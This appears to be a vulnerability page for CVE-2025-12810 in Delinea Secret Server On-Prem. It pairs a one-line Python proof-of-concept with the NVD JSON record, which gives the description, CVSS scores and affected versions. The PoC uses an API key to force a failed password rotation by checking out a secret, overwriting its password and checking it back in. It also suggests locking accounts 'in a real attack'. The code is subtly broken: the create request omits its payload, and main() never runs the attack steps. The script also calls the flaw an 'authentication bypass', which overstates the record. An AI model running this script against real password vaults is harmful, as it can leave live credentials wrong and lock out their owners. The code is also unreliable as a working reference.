CVE-2025-12810

# CVE-2025-12810 PoC - Secret Server On-Prem Password Rotation Authentication Bypass # This PoC demonstrates the improper authentication vulnerability in Secret Server import requests import json # Configuration TARGET_URL = "https://secret-server.example.com" API_KEY = "your-api-key" # Requires API access SECRET_ID = "12345" # Target secret ID def check_vulnerable_version(): """Check if Secret Server version is vulnerable""" response = requests.get( f"{TARGET_URL}/api/v1/system-information", headers={"Authorization": f"Bearer {API_KEY}"} ) if response.status_code == 200: version = response.json().get('version') vulnerable_versions = ['11.8.1', '11.9.6', '11.9.25'] return version in vulnerable_versions return False def create_secret_with_rotation(): """Create a secret with password rotation enabled""" payload = { "name": "Test Secret", "secretTemplateId": 6001, # Windows Account Template "folderId": 1, "autoChangeEnabled": True, "autoChangeOnCheckIn": True, # Key configuration "password": "OldPassword123!" } response = requests.post( f"{TARGET_URL}/api/v1/secrets", headers={"Authorization": f"Bearer {API_KEY}"} ) return response.json().get('id') def trigger_failed_rotation(secret_id): """Trigger password rotation failure by modifying target account""" # Step 1: Check out secret requests.post( f"{TARGET_URL}/api/v1/secrets/{secret_id}/check-out", headers={"Authorization": f"Bearer {API_KEY}"} ) # Step 2: Modify secret to trigger rotation failure # In real attack: Lock account or remove permissions payload = { "password": "InvalidPasswordThatWillFail!" } requests.put( f"{TARGET_URL}/api/v1/secrets/{secret_id}/fields/password", json=payload, headers={"Authorization": f"Bearer {API_KEY}"} ) # Step 3: Check in - this should fail but will succeed in vulnerable version response = requests.post( f"{TARGET_URL}/api/v1/secrets/{secret_id}/check-in", headers={"Authorization": f"Bearer {API_KEY}"} ) # Step 4: Verify secret is in inconsistent state secret = requests.get( f"{TARGET_URL}/api/v1/secrets/{secret_id}", headers={"Authorization": f"Bearer {API_KEY}"} ).json() return { 'checked_out': secret.get('checkedOut'), 'password_current': secret.get('password') != 'InvalidPasswordThatWillFail!' } def main(): if not check_vulnerable_version(): print("Target is not running a vulnerable version") return print("Target is running a vulnerable version of Secret Server") print("CVE-2025-12810: Improper Authentication in Password Rotation") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12810", "sourceIdentifier": "1443cd92-d354-46d2-9290-d812316ca43a", "published": "2026-01-27T20:16:14.320", "lastModified": "2026-02-06T18:26:20.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Authentication vulnerability in Delinea Inc. Secret Server On-Prem (RPC Password Rotation modules).This issue affects Secret Server On-Prem: 11.8.1, 11.9.6, 11.9.25.\n\nA secret with \"change password on check in\" enabled automatically checks in even when the password change fails after reaching its retry limit. This leaves the secret in an inconsistent state with the wrong password.\n\nRemediation: Upgrade to 11.9.47 or later. The secret will remain checked out when the password change fails."}, {"lang": "es", "value": "Vulnerabilidad de autenticación incorrecta en Delinea Inc. Secret Server On-Prem (módulos de rotación de contraseñas RPC). Este problema afecta a Secret Server On-Prem: 11.8.1, 11.9.6, 11.9.25.\n\nUn secreto con 'cambiar contraseña al registrarse' habilitado se registra automáticamente incluso cuando el cambio de contraseña falla después de alcanzar su límite de reintentos. Esto deja el secreto en un estado inconsistente con la contraseña incorrecta.\n\nRemediación: Actualizar a 11.9.47 o posterior. El secreto permanecerá desprotegido cuando el cambio de contraseña falle."}], "metrics": {"cvssMetricV40": [{"source": "1443cd92-d354-46d2-9290-d812316ca43a", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "1443cd92-d354-46d2-9290-d812316ca43a", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:delinea:secret_server:11.8.000001:*:*:*:on-premises:*:*:*", "matchCriteriaId": "3DEB66DF-4D22-4BF7-8051-F499719B5225"}, {"vulnerable": true, "criteria": "cpe:2.3:a:delinea:secret_server:11.9.000006:*:*:*:on-premises:*:*:*", "matchCriteriaId": "A6A4EA5B-682D-4942-A59B-9E1D51DD0A7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:delinea:secret_server:11.9.000025:*:*:*:on-premises:*:*:*", "matchCriteriaId": "B9FACC71-BAAF-4E7D-AAFF-EE9D1BFBB550"}]}]}], "references": [{"url": "https://docs.delinea.com/online-help/secret-server/release-notes/ss-rn-11-9-000047.htm", "source": "1443cd92-d354-46d2-9290-d812316ca43a", "tags": ["Release Notes"]}, {"url": "https://trust.delinea.com/?tcuUid=48260de9-954d-45c2-9c66-2c9510798a0b", "source": "1443cd92-d354-46d2-9290-d812316ca43a", "tags": ["Vendor Advisory"]}, {"url": "https://trust.delinea.com/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}